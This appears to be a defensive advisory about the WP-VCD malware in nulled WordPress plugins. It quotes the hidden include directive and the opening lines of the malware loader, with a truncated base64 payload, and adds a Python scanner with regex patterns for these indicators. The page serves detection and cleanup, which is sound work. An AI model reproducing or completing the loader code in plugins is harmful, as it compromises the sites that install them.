Another attack on WordPress 4.8
Visit: Medium
Check out the guidelines and remove the above-mentioned files to make your WordPress safe.
Let me know if you find anything suspicious in your WordPress.
If you think your WordPress is now secure, please click the Clap button on Medium.
The first step in defeating an enemy is to understand it. The cause of a WP-VCD attack is a nulled theme or a nulled plugin. The plugin installation file often contains this directive:
<?php if (file_exists(dirname(__FILE__) . '/class.plugin-modules.php'))
include_once(dirname(__FILE__) . '/class.plugin-modules.php'); ?>
<?php
/*
Plugin Name: Example
Plugin URI: http://example.com/
Author: John Doe
....
*/
That directive loads a script that spreads the malware. Opening that file reveals the malware code:
<?php
//install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 50);
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
$GLOBALS['WP_CD_CODE'] = 'PDHstAgXchan5E3JlcG9ydG...
So the first step in defeating the malware is to delete the affected plugin (or at least remove the malware code from the plugin).
Edit: On 05/13/2020, as per the R&D, ThejeswarReddy found that:
If you download a null theme/plugin and inspect all files for the code mentioned here, there is only one folder causing this issue: the '.settings' folder (usually in the root folder). It contains every file needed to create this malware. You can safely delete this folder and the plugin/theme still works!
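The checks described above can be automated before a theme or plugin is ever activated. The following scanner is an added example, not code from the original page or its contributors. It looks only for the indicators quoted here (the `class.plugin-modules.php` loader and its include, the `//install_code` marker, the `WP_CD_CODE` variable and a `.settings` folder). The function names and the sample tree are constructed for illustration.

```python
import os
import re
import tempfile
from pathlib import Path

# Indicators quoted on this page; other samples may use different names.
LOADER_NAME = "class.plugin-modules.php"
SUSPECT_DIR = ".settings"
CONTENT_PATTERNS = {
    "includes loader": re.compile(rb"include(?:_once)?\s*\(.*class\.plugin-modules\.php"),
    "WP_CD_CODE variable": re.compile(rb"\$GLOBALS\[\s*['\"]WP_CD_CODE['\"]\s*\]"),
    "install_code marker": re.compile(rb"//\s*install_code\d*"),
}

def scan(root):
    """Walk root and return sorted (relative_path, reason) findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        findings += [(os.path.relpath(os.path.join(dirpath, d), root), "suspect folder")
                     for d in dirnames if d == SUSPECT_DIR]
        for name in filenames:
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            if name == LOADER_NAME:
                findings.append((rel, "loader file"))
            if name.lower().endswith(".php"):
                data = Path(dirpath, name).read_bytes()
                findings += [(rel, why) for why, pat in CONTENT_PATTERNS.items()
                             if pat.search(data)]
    return sorted(findings)

# Constructed sample tree (written to a temp dir by demo()): one plugin
# carrying the page's indicators and one clean plugin.
SAMPLE = {
    "nulled/plugin.php": b"<?php\n"
        b"include_once(dirname(__FILE__) . '/class.plugin-modules.php'); ?>\n",
    "nulled/class.plugin-modules.php": b"<?php\n//install_code1\n$GLOBALS['WP_CD_CODE'] = 'X';\n",
    "nulled/.settings/note.txt": b"constructed\n",
    "clean/plugin.php": b"<?php\n/*\nPlugin Name: Clean\n*/\n",
}

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE.items():
            path = Path(tmp, rel)
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_bytes(body)
        return scan(tmp)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

To check a real site, call `scan()` on `wp-content/plugins` and `wp-content/themes`. A clean result only means these specific markers are absent.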
Rakshit Shah
Gabriele Serra
CodinCafe
ThejeswarReddy
EDIT #1 (01/08/2018):
If you want to contribute anything about the WP-VCD attack, create a pull request and let's try to make WordPress more secure.